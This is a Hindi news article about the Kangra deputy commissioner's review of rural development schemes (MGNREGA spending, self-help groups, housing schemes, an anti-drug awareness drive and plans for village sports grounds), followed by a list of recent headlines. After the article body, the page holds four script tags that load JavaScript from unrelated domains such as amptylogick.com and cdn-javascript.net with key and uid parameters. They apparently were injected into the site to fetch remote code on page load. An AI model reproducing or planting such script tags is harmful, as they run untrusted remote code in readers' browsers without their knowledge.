Categories: हिमाचल

कांगड़ाः डीसी ने की विकास खंडों में चल रहे विकास कार्यों की समीक्षा

<p>जिला कांगड़ा डीसी राकेश कुमार प्रजापति की अध्यक्षता में बीते कल कांगड़ा जिला के समस्त विकास खंडों में चल रहे विभिन्न विकास कार्यों की प्रगति की समीक्षा को लेकर डीआरडीए के सभागार में बैठक आयोजित की गई। बैठक में जिला के सभी खंड विकास अधिकारियों, डीआरडीए, पंचायती राज के अधिकारियों ने भाग लिया। उन्होंने कहा कि मनरेगा के तहत जिले में दीर्घकालिक विकास के लिए काम किया जा रहा है। कांगड़ा जिला में चालू वित्त वर्ष के दौरान मनरेगा के अंतर्गत 69 करोड़ 73 लाख रुपए खर्च किए जा चुके हैं। अब तक 23 लाख 86 हजार 594 कार्यदिवस अर्जित कर जिले में योजना का 45 प्रतिशत लक्ष्य हासिल कर लिया गया है।</p>

<p> <br />
उन्होंने राष्ट्रीय ग्रामीण आजीविका मिशन के तहत जिले में महिलाओं को स्वरोजगार अपनाने के लिए प्रोत्साहित करने एवं आत्मनिर्भर बनाने के उद्देश्य के साथ स्वयं सहायता समूहों के गठन पर बल दिया। योजना के तहत चालू वित्त वर्ष में 585 स्वयं सहायता समूहों के गठन का लक्ष्य निर्धारित किया गया और 1754 स्वयं सहायता समूहों को 13.25 करोड़ रुपए की सहायता दी गई है। प्रधानमंत्री आवास योजना, मुख्यमंत्री गृह निर्माण अनुदान योजना, मुख्यमंत्री लोक भवन योजना, प्रधानमंत्री आदर्श ग्राम योजना, मुख्यमंत्री आदर्श ग्राम योजनाओं का भी सुचारू कार्यान्वयन सुनिश्चित किया जाए। पंचायत स्तर पर ठोस कूड़ा कचरा निष्पादन के लिए भी उचित कार्ययोजना तैयार करने के लिए भी कहा गया है ताकि पंचायतों को स्वच्छ तथा सुंदर बनाया जा सके। उन्होंने विकास खंड अधिकारियों को दिशा निर्देश देते हुए कहा कि सभी योजनाओं एवं कार्यक्रमों की समीक्षा करना जरूरी है ताकि विकास कार्यों को पूर्ण करने में तेजी लाई जा सके।<br />
 <br />
उपायुक्त ने कहा कि पंचायतों में विकास कार्यों के लिए आवंटित धनराशि का सदुपयोग किया जाए, निर्माण कार्यों में गुणवत्ता का विशेष ध्यान रखा जाए। उन्होंने कहा कि विकास कार्यों को निर्धारित समयावधि में पूर्ण किया जाना भी जरूरी है। उन्होंने विकास खंड अधिकारियों को निर्देश देते हुए कहा कि 2017 से पहले विकास कार्यों के लिए आवंटित धनराशि खर्च नहीं हुई और कार्य भी शुरु नहीं हुए हैं। उक्त धनराशि को वापिस कर दें ताकि इसका उपयोग अन्य विकास कार्यों के लिए किया जा सके।</p>

<p>उपायुक्त ने कहा कि प्रदेश भर में लोगों को नशे के खिलाफ जागरूक करने उद्देश्य से 15 नवम्बर से 15 दिसम्बर तक यह विशेष जागरूकता अभियान चलाया गया है। नशामुक्त समाज के निर्माण के लिए सामूहिक प्रयासों की जरूरत है। युवा पीढ़ी को इस दलदल से बचाने के लिए सभी को मिलकर कार्य करना होगा। उन्होंने अधिकारियों से युवक मंडलों को इस अभियान से जोड़ने के लिए विशेष कार्य करने पर जोर देते हुए कहा कि इनके सयुंक्त प्रयासों से ज़िला में खेल गतिविधियों को बढ़ा कर उनकी उर्जा का समाज के कार्यों में समुचित लाभ उठाया जा सकता है। अधिकारियों को अपने-अपने विकास खंडों में भूमि चयनित कर 10-10 छोटे-छोटे खेल मैदान बनाने का आह्वान किया ताकि युवा वॉलीबाल, खो-खो, हैंडबाल जैसी खेल गतिविधियों में अपना ध्यान लगाकर नशे जैसी बुराई से दूर रहें। इससे पहले परियोजना अधिकारी डीआरडी, मुनीष शर्मा ने ग्रामीण विकास विभाग के माध्यम से कार्यान्वित की जा रही सभी योजनाओं के तहत अर्जित उपलब्धियों के बारे में विस्तार से जानकारी दी गई।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1574478783647″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

बारात के जश्‍न में थे सब मगन, अचानक दूल्‍हे के पिता को आया हार्ट अटैक और मौत

हिमाचल प्रदेश के चंबा जिले के मतियारा गांव में शादी का माहौल उस समय मातम…

23 mins ago

SatounSchool: सिरमौर का नाम फिर रोशन, सतोन स्कूल की 8 छात्राएं बनीं हॉकी चैम्पियन

Satoun School hockey achievement : सतोन पी एम श्री राजकीय वरिष्ठ माध्यमिक पाठशाला की छात्राओं…

29 mins ago

800 करोड़ रुपये का प्रोजेक्ट तैयार, आपदा से नुकसान कम करने पर सरकार का फोकस: सुक्‍खू

Samarth campaign disaster preparedness: हिमाचल प्रदेश के आपदा प्रबंधन विभाग द्वारा आपदा से निपटने के…

1 hour ago

Himachal: अक्टूबर में सूखे जैसे हालात, 95% कम बारिश दर्ज

Rainfall Deficit 2024: मानसून की विदाई के बाद हिमाचल प्रदेश में अक्टूबर के पहले 13…

2 hours ago

Himachal: 12 साल का सेवाकाल पूरा करने वाले जलरक्षकों को प्रोमोशन

Water Guards Promotion 2024:  जलशक्ति विभाग में 12 साल का सेवाकाल पूरा कर चुके 184…

2 hours ago

Baba Siddique Murder Case: बोन टेस्ट में खुलासा, आरोपी धर्मराज कश्यप नाबालिग नहीं

Mumbai:  महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…

2 hours ago